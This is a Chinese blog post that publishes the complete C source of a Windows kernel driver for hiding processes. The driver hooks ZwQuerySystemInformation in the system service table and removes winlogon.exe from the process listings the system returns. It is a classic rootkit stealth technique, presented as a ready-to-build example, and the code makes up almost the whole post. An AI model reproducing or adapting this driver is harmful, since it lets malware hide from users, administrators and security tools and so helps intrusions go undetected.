• 进程的深度隐藏


     /*********************************************************

    查找进程操作系统最终调用native api ZwQuerySystemInformation

    因此拦截此函数可以达到隐藏进程的目的。

    *********************************************************/

    /*********************************************************

    参考

    <隐藏任意进程,目录/文件,注册表,端口> sinister whitecell

    <再谈Windows NT_2000内部数据结构>       webcrazy

    regmon source code                      www.sysinternals.com

    *********************************************************/

    /*********************************************************

    这仅仅是一个简单的例子,

    load该驱动后winlogon进程被隐藏

    *********************************************************/

     

     

     

     

    #include "ntddk.h"

    #include "stdarg.h"

    #include "stdio.h"

     

    //----------------------------------------------------------------------

    //                           DEFINES

    //----------------------------------------------------------------------

    #if DBG

    #define DbgPrint(arg) DbgPrint arg

    #else

    #define DbgPrint(arg)

    #endif

     

    //

    //32768-65535 are reserved for use  by customers

    //

     

     

    #define FILE_DEVICE_PROCESSHIDE      0x00008306

    //

    //available only on x86 now

    //

     

     

    #define SYSCALL(_function)  ServiceTable->ServiceTable[ *(PULONG)((PUCHAR)_fun

    ction+1)]

     

    typedef unsigned long       DWORD;

    typedef unsigned short      WORD;

    typedef int                           BOOL;

    //

    //structure unopen, parameter into ZwQueryDirectoryFile routine.

    //God bless me it will not be changed.ms is shit...

    //

    struct _SYSTEM_THREADS

    {

        LARGE_INTEGER        KernelTime;

        LARGE_INTEGER        UserTime;

        LARGE_INTEGER        CreateTime;

        ULONG                WaitTime;

        PVOID                StartAddress;

        CLIENT_ID            ClientIs;

        KPRIORITY            Priority;

        KPRIORITY            BasePriority;

        ULONG                ContextSwitchCount;

        ULONG                ThreadState;

        KWAIT_REASON         WaitReason;

    };

    struct _SYSTEM_PROCESSES

    {

        ULONG                NextEntryDelta;

        ULONG                ThreadCount;

        ULONG                Reserved[6];

        LARGE_INTEGER        CreateTime;

        LARGE_INTEGER        UserTime;

        LARGE_INTEGER        KernelTime;

        UNICODE_STRING       ProcessName;

        KPRIORITY            BasePriority;

        ULONG                ProcessId;

        ULONG                InheritedFromProcessId;

        ULONG                HandleCount;

        ULONG                Reserved2[2];

        VM_COUNTERS          VmCounters;

        IO_COUNTERS          IoCounters;

        struct _SYSTEM_THREADS Threads[1];

    };

     

    //

    // Definition for system call service table

    //

    typedef struct _SRVTABLE {

            PVOID           *ServiceTable;

            ULONG           LowCall;

            ULONG           HiCall;

            PVOID           *ArgTable;

    } SRVTABLE, *PSRVTABLE;

     

     

    NTSTATUS (*RealZwQuerySystemInformation)(

        IN ULONG SystemInformationClass,

        IN PVOID SystemInformation,

        IN ULONG SystemInformationLength,

        OUT PULONG ReturnLength);

    //----------------------------------------------------------------------

    //                         GLOBALS

    //----------------------------------------------------------------------

    //

    // Pointer to system global service table

    //

    PSRVTABLE               ServiceTable;

    extern PSRVTABLE KeServiceDescriptorTable;

    PDEVICE_OBJECT          ControlDeviceObject;

     

    //----------------------------------------------------------------------

    //                         FORWARD DEFINES

    //----------------------------------------------------------------------

    NTSTATUS ProcesshideDispatch( IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp );

    VOID     ProcesshideUnload( IN PDRIVER_OBJECT DriverObject );

    NTSYSAPI

    NTSTATUS

    NTAPI ZwQuerySystemInformation(

        IN ULONG SystemInformationClass,

        IN PVOID SystemInformation,

        IN ULONG SystemInformationLength,

        OUT PULONG ReturnLength

        );

     

    //======================================================================

    //                    H O O K  R O U T I N E S

    //======================================================================

     

    //----------------------------------------------------------------------

    //

    // HookZwQueryDirectoryFile

    //

    //----------------------------------------------------------------------

    NTSTATUS HookZwQuerySystemInformation(

        IN ULONG SystemInformationClass,

        IN PVOID SystemInformation,

        IN ULONG SystemInformationLength,

        OUT PULONG ReturnLength)

    {

        NTSTATUS rc;

        ANSI_STRING process_name,process_uname,process_name1,process_name2;

        BOOL    g_hide_proc = TRUE;

        CHAR    aProcessName[80];

        char    aWinlogon[] = "winlogon.exe";

        int     found;

        // 执行旧的ZwQuerySystemInformation函数

        rc =(RealZwQuerySystemInformation)(

            SystemInformationClass,

            SystemInformation,

            SystemInformationLength,

            ReturnLength );

        if(NT_SUCCESS(rc))

        {

            if( g_hide_proc && (5 == SystemInformationClass))

            {

                // 将查找出来结果赋给结构

                struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES

    *)SystemInformation;

                struct _SYSTEM_PROCESSES *prev = NULL;

                // 遍历进程

                while(curr)

                {

                                    RtlUnicodeStringToAnsiString(&process_name,

    &curr->ProcessName, TRUE);

                    if((0 < process_name.Length) && (255 > process_name.Length))

     

                    {

                        found=0;

     

                                            if (RtlCompareMemory(process_name.Buff

    er,aWinlogon,strlen(aWinlogon)) == strlen(aWinlogon))

                                            {

                                                    found =1;

                                            }

     

                        // 判断如果是隐藏进程名则覆盖掉此进程名

                        while(found)

                        {

                            if(prev)

                            {

                                if(curr->NextEntryDelta)

                                {

                                    prev->NextEntryDelta += curr->NextEntryDelta;

                                }

                                else

                                {

                                    prev->NextEntryDelta = 0;

                                }

                            }

                            else

                            {

                                if(curr->NextEntryDelta)

                                {

                                    (char *)SystemInformation +=

    curr->NextEntryDelta;

                                }

                                else

                                {

                                    SystemInformation = NULL;

                                }

                            }

     

                            if(curr->NextEntryDelta)

                                                    {

                                                            (char *)curr +=

    curr->NextEntryDelta;

                                                    }

                            else

                            {

                                                            curr = NULL;

                                                            break;

                            }

                            // 遍历链表

                            found = 0;

     

                                                    RtlUnicodeStringToAnsiString(&

    process_name, &curr->ProcessName, TRUE);

                                                    if (RtlCompareMemory(process_n

    ame.Buffer,aWinlogon,strlen(aWinlogon)) == strlen(aWinlogon))

                                                    {

                                                            found = 1;

                                                    }

     

                                            }

                                    }

                                    if(curr != NULL)

                                    {

                                            prev = curr;

                                            if(curr->NextEntryDelta) ((char

    *)curr += curr->NextEntryDelta);

                                            else curr = NULL;

                                    }

                                    RtlFreeAnsiString(&process_name);

                            }

            }

        }

        return(rc);

    }

     

    //----------------------------------------------------------------------

    //

    // HookRegistry

    //

    // Replaces entries in the system service table with pointers to

    // our own hook routines. We save off the real routine addresses.

    //

    //----------------------------------------------------------------------

    VOID HookSystemCall( void )

    {

     

            //

            // Hook everything

            //

     

            RealZwQuerySystemInformation = SYSCALL( ZwQuerySystemInformation );

            SYSCALL( ZwQuerySystemInformation ) = (PVOID) HookZwQuerySystemInforma

    tion;

     

    }

     

     

    //----------------------------------------------------------------------

    //

    // UnhookZwQueryDirectoryFile

    //

    //----------------------------------------------------------------------

    VOID UnhookSystemCall( )

    {

     

            //

            // Unhook everything

            //

        SYSCALL( ZwQuerySystemInformation ) = (PVOID) RealZwQuerySystemInformation

    ;

     

    }

     

     

     

    //----------------------------------------------------------------------

    //

    // FilehideDispatch

    //

    //----------------------------------------------------------------------

    NTSTATUS ProcesshideDispatch( IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp )

    {

        PIO_STACK_LOCATION      irpStack;

     

        //

        // Go ahead and set the request up as successful

        //

        Irp->IoStatus.Status      = STATUS_SUCCESS;

        Irp->IoStatus.Information = 0;

     

        //

        // Get a pointer to the current location in the Irp. This is where

        //     the function codes and parameters are located.

        //

        irpStack = IoGetCurrentIrpStackLocation (Irp);

     

     

     

        switch (irpStack->MajorFunction) {

        case IRP_MJ_CREATE:

     

            DbgPrint(("Processhide: IRP_MJ_CREATE\n"));

     

            break;

     

        case IRP_MJ_SHUTDOWN:

     

            DbgPrint(("Processhide: IRP_MJ_CREATE\n"));

            break;

     

        case IRP_MJ_CLOSE:

     

            DbgPrint(("Processhide: IRP_MJ_CLOSE\n"));

            break;

     

        case IRP_MJ_DEVICE_CONTROL:

     

            DbgPrint (("Processhide: IRP_MJ_DEVICE_CONTROL\n"));

     

            break;

        }

        IoCompleteRequest( Irp, IO_NO_INCREMENT );

        return STATUS_SUCCESS;

    }

     

     

     

    //----------------------------------------------------------------------

    //

    // RegmonUnload

    //

    // Our job is done - time to leave.

    //

    //----------------------------------------------------------------------

    VOID ProcesshideUnload( IN PDRIVER_OBJECT DriverObject )

    {

        WCHAR                   deviceLinkBuffer[]  = L"\\DosDevices\\Processhide"

    ;

        UNICODE_STRING          deviceLinkUnicodeString;

     

        DbgPrint(("Processhide.SYS: unloading\n"));

     

        //

        // Unhook the registry

        //

        UnhookSystemCall();

     

        //

        // Delete the symbolic link for our device

        //

        RtlInitUnicodeString( &deviceLinkUnicodeString, deviceLinkBuffer );

        IoDeleteSymbolicLink( &deviceLinkUnicodeString );

     

        //

        // Delete the device object

        //

        IoDeleteDevice( DriverObject->DeviceObject );

     

        DbgPrint(("Processhide.SYS: deleted devices\n"));

     

    }

     

     

     

    //----------------------------------------------------------------------

    //

    // DriverEntry

    //

    // Installable driver initialization. Here we just set ourselves up.

    //

    //----------------------------------------------------------------------

    NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING

    RegistryPath )

    {

        NTSTATUS                ntStatus;

        WCHAR                   deviceNameBuffer[]  = L"\\Device\\Processhide";

        UNICODE_STRING          deviceNameUnicodeString;

        WCHAR                   deviceLinkBuffer[]  = L"\\DosDevices\\Processhide"

    ;

        UNICODE_STRING          deviceLinkUnicodeString;

     

     

        DbgPrint (("Processhide.SYS: entering DriverEntry\n"));

     

     

        //

        // Setup our name and symbolic link

        //

        RtlInitUnicodeString (&deviceNameUnicodeString,

                              deviceNameBuffer );

        RtlInitUnicodeString (&deviceLinkUnicodeString,

                              deviceLinkBuffer );

     

        ntStatus = IoCreateDevice ( DriverObject,

                                    0,

                                    &deviceNameUnicodeString,

                                    FILE_DEVICE_PROCESSHIDE,

                                    0,

                                    TRUE,

                                    &ControlDeviceObject );

        if (NT_SUCCESS(ntStatus)) {

     

            //

            // Create a symbolic link that the GUI can specify to gain access

            // to this driver/device

            //

            ntStatus = IoCreateSymbolicLink (&deviceLinkUnicodeString,

                                             &deviceNameUnicodeString );

     

            //

            // Create dispatch points for all routines that must be handled

            //

            DriverObject->MajorFunction[IRP_MJ_SHUTDOWN]        =

            DriverObject->MajorFunction[IRP_MJ_CREATE]          =

            DriverObject->MajorFunction[IRP_MJ_CLOSE]           =

            DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL]  =

    ProcesshideDispatch;

    #if DBG

            DriverObject->DriverUnload                          =

    ProcesshideUnload;

    #endif

        }

        if (!NT_SUCCESS(ntStatus)) {

     

            DbgPrint(("Processhide: Failed to create our device!\n"));

     

            //

            // Something went wrong, so clean up (free resources etc)

            //

            if( ControlDeviceObject ) IoDeleteDevice( ControlDeviceObject );

            IoDeleteSymbolicLink( &deviceLinkUnicodeString );

            return ntStatus;

        }

     

        //

        // Pointer to system table data structure is an NTOSKRNL export

        //

        ServiceTable = KeServiceDescriptorTable;

        DbgPrint(("Processhide: Servicetable: %x\n", ServiceTable ));

            HookSystemCall();

            DbgPrint(("Processhide: Hook System Call"));

        return STATUS_SUCCESS;

    }

     

     

     

     

     

     

     

     

     

     

    --

  • 相关阅读:
    Apache 基础
    Oracle
    DevOps
    Ansible
    Iptables 和Firewall 防火墙
    防火墙
    Linux
    Intellij IDEA 快捷键大全
    Java8,9 新特性
    Jmeter
  • 原文地址:https://www.cnblogs.com/sizzle/p/911091.html
Copyright © 2020-2023  润新知